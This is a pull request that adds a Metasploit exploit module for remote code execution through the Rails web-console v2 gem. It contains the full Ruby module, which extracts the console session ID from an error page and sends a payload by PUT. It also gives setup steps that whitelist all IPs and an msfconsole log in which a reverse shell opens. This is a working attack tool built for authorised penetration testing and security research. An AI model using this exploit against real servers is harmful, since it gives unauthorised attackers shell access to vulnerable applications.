### PR TITLE
Add a module to abuse the Rails web-console (v2) gem

### DIFF
--- a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(80),
+        Opt::RPORT(3000),
         OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/missing404"])
       ], self.class)
 

--- a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails Development Web Console (v2) Code Execution',
+      'Description'    => %q{
+          This module exploits a remote code execution feature of the Ruby on Rails
+        framework. This feature is exposed if the config.web_console.whitelisted_ips
+        setting includes untrusted IP ranges and the web-console gem is enabled.
+      },
+      'Author'         => ['hdm'],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://github.com/rails/web-console' ]
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        =>	[ ['Automatic', {} ] ],
+      'DefaultOptions' => { "PrependFork" => true },
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/missing404"])
+      ], self.class)
+
+  end
+
+  #
+  # Identify the web console path and session ID, then inject code with it
+  #
+  def exploit
+
+   res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'GET'
+    }, 25)
+
+    if ! res
+       print_error("Error: No response requesting #{datastore['TARGETURI']}")
+      return
+    end
+
+    if res.body.to_s !~ /data-mount-point='([^']+)'/
+      if res.body.to_s.index("Application Trace") && res.body.to_s.index("Toggle session dump")
+        print_error("Error: The web console is either disabled or you are not in the whitelisted scope")
+      else
+        print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
+      end
+      return
+    end
+
+    console_path = $1 + "/repl_sessions"
+
+    if res.body.to_s !~ /data-session-id='([^']+)'/
+      print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
+      return
+    end
+
+    session_id = $1
+
+    print_status("Sending payload to #{console_path}/#{session_id}")
+    res = send_request_cgi({
+      'uri'     => console_path + "/" + session_id,
+      'method'  => 'PUT',
+      'headers' => {
+        'Accept' => 'application/vnd.web-console.v2',
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        'input' => payload.encoded
+      }
+
+    }, 25)
+
+    handler
+  end
+end

--- a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@@ -45,13 +45,13 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def exploit
 
-   res = send_request_cgi({
+    res = send_request_cgi({
       'uri'     => normalize_uri(target_uri.path),
       'method'  => 'GET'
     }, 25)
 
     if ! res
-       print_error("Error: No response requesting #{datastore['TARGETURI']}")
+      print_error("Error: No response requesting #{datastore['TARGETURI']}")
       return
     end
 
@@ -75,10 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Sending payload to #{console_path}/#{session_id}")
     res = send_request_cgi({
-      'uri'     => console_path + "/" + session_id,
-      'method'  => 'PUT',
-      'headers' => {
-        'Accept' => 'application/vnd.web-console.v2',
+      'uri'       => console_path + "/" + session_id,
+      'method'    => 'PUT',
+      'headers'   => {
+        'Accept'           => 'application/vnd.web-console.v2',
         'X-Requested-With' => 'XMLHttpRequest'
       },
       'vars_post' => {

--- a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'Targets'        =>	[ ['Automatic', {} ] ],
       'DefaultOptions' => { "PrependFork" => true },
+      'DisclosureDate' => 'May 2 2016',
       'DefaultTarget' => 0))
 
     register_options(


### PR DESCRIPTION
This changeset includes a new exploit module that can inject code into Ruby on Rails applications if the web-console gem is enabled and the attacker happens to be within the whitelisted IP range of the web console configuration.
## Verification

Install RoR 4.2.6, generate a new application, modify the web console whitelist to include your IP range, and start the server:

```
$ gem install rails -v 4.2.6
$ rails new taco
$ cd taco
$ vim config/environments/development.rb
 Add the following line just before the final `end' tag:
 config.web_console.whitelisted_ips = %w(0.0.0.0/0)
$ bundle
$ rails server
```

Launch msfconsole, select the exploit, set the host, set the port, get the shell:

```
msf > use exploit/multi/http/rails_web_console_v2_code_exec 
msf exploit(rails_web_console_v2_code_exec) > set RHOST <target>
msf exploit(rails_web_console_v2_code_exec) > set RPORT 3000
msf exploit(rails_web_console_v2_code_exec) > exploit 

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Sending payload to /__web_console/repl_sessions/8160f3cd81f4b31f9dd8395a704df91d
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:40140) at 2016-05-02 02:43:53 -0500

id
uid=1000(hdm)
```

This is a bit of a silly module, but might be useful some day, and was a fun distraction from actually writing Rails code =)
